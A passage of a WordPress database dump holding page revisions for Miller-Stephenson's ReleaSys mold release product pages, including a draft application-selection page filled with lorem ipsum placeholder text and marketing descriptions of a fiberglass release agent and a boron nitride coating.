INSERT INTO `wp_posts` VALUES (4350, 3, '2017-05-30 19:30:07', '2017-05-30 19:30:07', '<h3 style="text-align: left;"><strong>Choosing ReleaSys<em>™</em> By Application</strong></h3>\r\nMiller-Stephenson\'s exclusive mold release product line, ReleaSys<em>™</em> , offers technologically advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness.  However it is not always easy for engineers and plant managers to know which grade of ReleaSys would perform best in their manufacturing operation.  Criteria such as mold geometry, mold temperature, substrate, application method, etc all playa role in deciding the best release agent for your application.  To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.  If after review of these categories you remain unsure of which grade is optimized for your molding application please contact our technical specialist by calling <strong>203-743-4447</strong> or submitting a inquiry to our <a href="https://www.miller-stephenson.com/tech-support/">Tech-Support team here.</a>\r\n\r\n&nbsp;\r\n\r\n<strong>Advanced Composites/FRP Mold Release</strong>\r\n<div>\r\n\r\n<img class="wp-image-4287 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_530979514-340x340.jpg" alt="specialty mold release" width="168" height="168" />\r\n\r\n<img class=" wp-image-1918 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505-340x340.jpg" alt="heloxy-505" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>Rotational Plastics Mold Release</strong>\r\n\r\n<img class="wp-image-4282 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472-340x340.jpg" alt="PTFE release" width="170" height="170" />\r\n\r\n<img class="wp-image-1917 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-116-340x340.jpg" alt="heloxy-116" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Polyurethane Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-30 19:30:07', '2017-05-30 19:30:07', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4351, 3, '2017-05-30 19:57:55', '2017-05-30 19:57:55', '', 'shutterstock_469809758', '', 'inherit', 'closed', 'closed', '', 'shutterstock_469809758', '', '', '2017-05-30 19:57:55', '2017-05-30 19:57:55', '', 4321, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_469809758.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4352, 3, '2017-05-30 20:01:21', '2017-05-30 20:01:21', '<h3 style="text-align: left;"><strong>Choosing ReleaSys<em>™</em> By Application</strong></h3>\r\nMiller-Stephenson\'s exclusive mold release product line, ReleaSys<em>™</em> , offers technologically advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness.  However it is not always easy for engineers and plant managers to know which grade of ReleaSys would perform best in their manufacturing operation.  Criteria such as mold geometry, mold temperature, substrate, application method, etc all playa role in deciding the best release agent for your application.  To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.  If after review of these categories you remain unsure of which grade is optimized for your molding application please contact our technical specialist by calling <strong>203-743-4447</strong> or submitting a inquiry to our <a href="https://www.miller-stephenson.com/tech-support/">Tech-Support team here.</a>\r\n\r\n&nbsp;\r\n\r\n<strong>Advanced Composites/FRP Mold Release</strong>\r\n<div>\r\n\r\n&nbsp;\r\n\r\n<img class=" wp-image-1918 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505-340x340.jpg" alt="heloxy-505" width="170" height="170" /><img class="alignleft wp-image-4351" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_469809758-340x340.jpg" alt="shutterstock_469809758" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>Rotational Plastics Mold Release</strong>\r\n\r\n<img class="wp-image-4282 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472-340x340.jpg" alt="PTFE release" width="171" height="171" />\r\n\r\n<img class="wp-image-1917 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-116-340x340.jpg" alt="heloxy-116" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Polyurethane Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-30 20:01:21', '2017-05-30 20:01:21', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4353, 0, '2017-05-31 02:11:44', '2017-05-31 02:11:44', '', '', '', 'publish', 'closed', 'closed', '', '4353', '', '', '2017-05-31 02:11:44', '2017-05-31 02:11:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/4353/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4354, 1162, '2017-05-31 10:39:34', '2017-05-31 10:39:34', '', '', '', 'publish', 'closed', 'closed', '', '4354', '', '', '2017-05-31 10:39:34', '2017-05-31 10:39:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/4354/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4355, 3, '2017-06-04 17:53:02', '2017-06-04 17:53:02', '<h2>ReleaSys™ 9900 Fiberglass Release Agent</h2>\n<h3>Sophisticated Chemical Solutions for Composite/FRP Molding Applications</h3>\nReleaSys 9900 Fiberglass release agent is a water-based release agent which utilizes a proprietary polymeric backbone that generates a mold coating that binds tenaciously to mold surfaces providing a durable thin film with excellent surface slip and ease of  release.  ReleaSys 9900 is ideally suited for reinforced polyester (FRP) composites due to its high slip coating, which cures quickly and provides multiple releases for low VOC polyester gel-coat and other tough releasing polyester structures. ReleaSys 9900 functions equally well for the release of epoxies, polyester resins, vinyl ester resins, thermoplastics, adhesives, and rotationally molded plastics. <span style="text-decoration: underline;">ReleaSys 9900 Fiberglass release agent</span> is particularly well suited for tougher to release processes such as filament winding and non gel coated polyester and fiberglass molding. Benefits of ReleaSys 9900 include:\n<ul>\n 	<li>Rapid Cure; High crosslinking</li>\n 	<li>Superior mold adherence and durability</li>\n 	<li>Exceptional utility across a broad range of substrates</li>\n 	<li>Ideally suited for FRP composites and Thermoplastics</li>\n 	<li>Improves part quality; Protects mold surface</li>\n 	<li>Eco-friendly Waterbased formulation</li>\n 	<li>Low odor; No VOC</li>\n</ul>\n<h3>Miller-Stephenson Specializes in the Development of High-Performance Mold Release Solutions</h3>\nReleaSys 9900 Fiberglass release agent was developed in direct response to our customers needs. Our customers required a mold release agent that was not only water-based but also could cure rapidly without the need for high heat exposure. Putting over 50 years of mold release expertise to use, Miller-Stephenson chemists developed a revolutionary product which not only has a rapid cure (even at room temperature) but displays superior abrasion resistance, durability and surface slip.  ReleaSys 990 to a mold release agent which can release numerous parts without reapplication regardless of the substrate, while simultaneous increasing part quality and minimizing mold release agent transfer. The advanced chemistry within ReleaSys 9800 holds tremendous utility and applicators will see the immediate effects.\n<ul>\n 	<li>Molded parts can be post-painted or glued with little or no surface preparation</li>\n 	<li>Decreased cost of scrap and waste.</li>\n 	<li>Reduced frequency of equipment maintenance and replacement</li>\n 	<li>Ability to restore and extend the life of your equipment</li>\n 	<li>Improved mold integrity, surface quality and throughput</li>\n 	<li>Low product application levels result in a cleaner working environment</li>\n</ul>\n<h3>50+ years of Industry Expertise at your service</h3>\nMiller-Stephenson has had a long history in composite molding industries, and our ReleaSys brand of products are respected around the world for quality and reliability. When you purchase Miller-Stephenon ReleaSys Semi-Permanent mold release agents you not only get industry leading products, you also gain access to our many years of direct production floor experience. We understand your production issues and can help you optimize your mold preparation, maintenance and release processes to improve your bottom line.\n\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a>\n\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">Click here for information, Which mold release agent is right for you</a></strong>\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;', 'ReleaSys™ 9900 | Fiberglass Release Agent', 'ReleaSys 9900 is a water-based release agent which utilizes a proprietary polymeric backbone that generates a coating that binds tenaciously to mold surfaces providing a durable thin film with excellent surface slip and ease of release.  ReleaSys 9900 is ideally suited for reinforced polyester (FRP) composites due to its high slip coating, which cures quickly and provides multiple releases.  ReleaSys 9900 functions equally well for the release of epoxies, polyester resins, vinyl ester resins, thermoplastics, adhesives, and rotationally molded plastics. Benefits include:\n<ul>\n 	<li>Rapid Cure; High crosslinking</li>\n 	<li>Superior mold adherence and durability</li>\n 	<li>Exceptional utility across a broad range of substrates</li>\n 	<li>Ideally suited for FRP composites and Thermoplastics</li>\n 	<li>Improves part quality; Protects mold surface</li>\n</ul>', 'inherit', 'closed', 'closed', '', '4336-autosave-v1', '', '', '2017-06-04 17:53:02', '2017-06-04 17:53:02', '', 4336, 'https://www.miller-stephenson.com/4336-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4356, 3, '2017-05-31 12:17:34', '2017-05-31 12:17:34', '<h2>ReleaSys™ HT | Bor</h2>\n<h3>Water-based High-Temperature Release Agent (600-1800°F)</h3>\nReleaSys<sup>™</sup> HT is a specialized, water-based release agent specifically designed for high temperature molding operations.  This formula utilizes a proprietary boron nitride complex to achieve unmatched lubricity and mold release performance. ReleaSys<sup>™</sup> HT boron nitride coatings prevent sticking to increase life of dies/molds, improve product surface finishes, and reduce production times. ReleaSys HT makes an excellent surface coating for molds used to produce castings of light metals such as magnesium and for coating surfaces in glass making operations. Our formulation is 100% VOC-free making it an eco-friendly and safer alternative to solvent-based alternatives. Applications include:\n<ul>\n 	<li>Mold Release for High Temperature and Difficult to Mold Polymers and Composites</li>\n 	<li>Mold release for Casting Metals and Glass</li>\n 	<li>Mold Dressing for Powder Metal Processing</li>\n 	<li>Surface Coating for High Temperature Surface</li>\n 	<li>Barrier Coating for Aggressive Environmental processes</li>\n 	<li>Specialty Lubricant for Drawing and Working Metals</li>\n</ul>\nBoron nitride coatings developed by proper application of ReleaSys HT are extremely durable and stable, allowing for longer operational time before re-application is necessary.  Miller-Stephenson\'s proprietary boron nitride complex technology allows for greater surface adhesion, lubricity, and stability meaning operators can mold more parts without the need for constant re-application.  Moreover our boron nitride coatings exhibit minimal mold fouling and transfer, allowing expensive molds to remain in service longer with the need for expensive re-surfacing to occur. Our boron nitride coating within ReleaSys HT can inhibit corrosion and chemical attack in metal forming, glass-making and sintering processes, thereby increasing die life and improving product quality.\n\n<a href="https://www.miller-stephenson.com/mold-release-agents/">For help with choosing which mold release is right for your application check out article section here</a>', 'ReleaSys™ HT | Boron Nitride Coating', 'ReleaSys<sup>™</sup> HT is a specialized, water-based release agent specifically designed for high temperature molding operations.  This formula utilizes a proprietary boron nitride complex to achieve unmatched lubricity and mold release performance. The inert and non-wetting nature of ReleaSys<sup>™</sup> HT makes it an excellent surface coating for molds used to produce castings of light metals such as magnesium and for coating surfaces in glass making operations. Advantages include:\n<ul>\n 	<li>Water-based; VOC-free formula</li>\n 	<li>Enhanced surface adhesion and durability</li>\n 	<li>Protects Mold and Die Surfaces</li>\n 	<li>High Temperature Stability up to 1562°F (850°C) in air</li>\n</ul>', 'inherit', 'closed', 'closed', '', '3787-autosave-v1', '', '', '2017-05-31 12:17:34', '2017-05-31 12:17:34', '', 3787, 'https://www.miller-stephenson.com/3787-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4357, 3, '2017-05-31 13:38:20', '2017-05-31 13:38:20', '<h3 style="text-align: left;"><strong>Choosing ReleaSys<em>™</em> By Application</strong></h3>\r\nMiller-Stephenson\'s exclusive mold release product line, ReleaSys<em>™</em> , offers technologically advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness.  However it is not always easy for engineers and plant managers to know which grade of ReleaSys would perform best in their manufacturing operation.  Criteria such as mold geometry, mold temperature, substrate, application method, etc all play a key role in deciding the best release agent for your application.  To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.  If after review of these categories you remain unsure of which grade is optimized for your molding application please contact our technical specialist at <strong>203-743-4447</strong> or submitting an inquiry to our <a href="https://www.miller-stephenson.com/tech-support/">Tech-Support team here.</a>\r\n\r\n&nbsp;\r\n\r\n<strong>Advanced Composites/FRP Mold Release</strong>\r\n<div>\r\n\r\n&nbsp;\r\n\r\n<img class=" wp-image-1918 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505-340x340.jpg" alt="heloxy-505" width="170" height="170" /><img class="alignleft wp-image-4351" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_469809758-340x340.jpg" alt="shutterstock_469809758" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>Rotational Plastics Mold Release</strong>\r\n\r\n<img class="wp-image-4282 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_566838472-340x340.jpg" alt="PTFE release" width="171" height="171" />\r\n\r\n<img class="wp-image-1917 alignright" 